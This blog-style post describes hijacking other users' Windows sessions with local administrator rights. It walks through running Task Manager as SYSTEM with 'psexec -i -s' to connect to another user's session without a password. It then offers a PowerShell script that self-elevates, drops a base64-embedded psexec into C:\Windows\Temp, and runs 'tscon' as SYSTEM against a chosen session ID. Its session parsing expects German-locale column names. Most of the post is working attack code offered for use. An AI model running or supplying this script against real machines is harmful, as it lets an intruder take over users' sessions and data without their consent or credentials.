While watching one of John Hammond’s YouTube videos, I stumbled across a really interesting discussion about session hijacking when you already have local administrator access. It wasn’t about some wild zero-day or complex exploit, but instead showed how everyday privileges can be used in ways people don’t always think about.
What stood out to me was just how powerful local admin access really is. The video walked through how that level of access can interact with active user sessions, which is something that’s easy to overlook. It was a good reminder that a lot of security issues come from misunderstood basics rather than advanced attack techniques.
In the demo, they used standard system tools to take over an existing user session. Normally, doing something like that as a regular user would prompt for the target user’s password. But with elevated privileges, that prompt never appears, the session is simply taken over.
Here is a short tutorial on how i did this:
Start Task manager as System
- get the psexec Sysinternal from Microsoft
- run the following command:
psexec -i -s taskmgr.exe- Navigate to the Users tab
- Right click on the user you want to hijack and click connect
At Step 3 usually windows would prompt you to enter the usernames Credentials but in this case it just connects without any prompt.
I also threw together a quick PowerShell script to automate this.
To make this script work you will need the base64 string for the psexec that i left out for this guide because it would make it too bloated.
if you already have psexec on your pc just change the file path in the %filename variable:
$filename = "C:\Windows\Temp\psexec64.exe"
# Get the ID and security principal of the current user account
$myWindowsID = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$myWindowsPrincipal = new-object System.Security.Principal.WindowsPrincipal($myWindowsID)
# Get the security principal for the Administrator role
$adminRole = [System.Security.Principal.WindowsBuiltInRole]::Administrator
# Check to see if we are currently running "as Administrator"
if ($myWindowsPrincipal.IsInRole($adminRole)) {
# We are running "as Administrator" - so change the title and background color to indicate this
Write-Host "> Already Admin..."
}
else {
# We are not running "as Administrator" - so relaunch as administrator
# Create a new process object that starts PowerShell
$newProcess = new-object System.Diagnostics.ProcessStartInfo "PowerShell";
# Specify the current script path and name as a parameter
$newProcess.Arguments = $myInvocation.MyCommand.Definition;
# Indicate that the process should be elevated
$newProcess.Verb = "runas";
# Start the new process
[System.Diagnostics.Process]::Start($newProcess);
# Exit from the current, unelevated, process
exit
}
$psexecBase64 = "< PSexec base64 string >"
function query-UserSessions {
$Computer = $env:COMPUTERNAME
$Users = query user /server:$Computer 2>&1
$Users = $Users | ForEach-Object {
(($_.trim() -replace ">" -replace "(?m)^([A-Za-z0-9]{3,})\s+(\d{1,2}\s+\w+)", '$1 none $2' -replace "\s{2,}", "," -replace "none", $null))
} | ConvertFrom-Csv
foreach ($User in $Users) {
[PSCustomObject]@{
ComputerName = $Computer
Username = $User.BENUTZERNAME
ID = $User.ID
SessionState = $User.STATUS.Replace("Disc", "Disconnected")
SessionType = $($User.SITZUNGSNAME -Replace '#', '' -Replace "[0-9]+", "")
}
}
}
# Query the logged in users
query-UserSessions | Select-Object -Property Username, ID | format-table
$hijackSessionID = Read-Host "ID to hijack"
# Write the psexec file into the designated directory
$bytes = [Convert]::FromBase64String($psexecBase64)
[IO.File]::WriteAllBytes($filename, $bytes)
# run the tscon command with system user to switch user session
Start-Process -FilePath $filename -ArgumentList "-i -s tscon.exe $hijackSessionID "
pause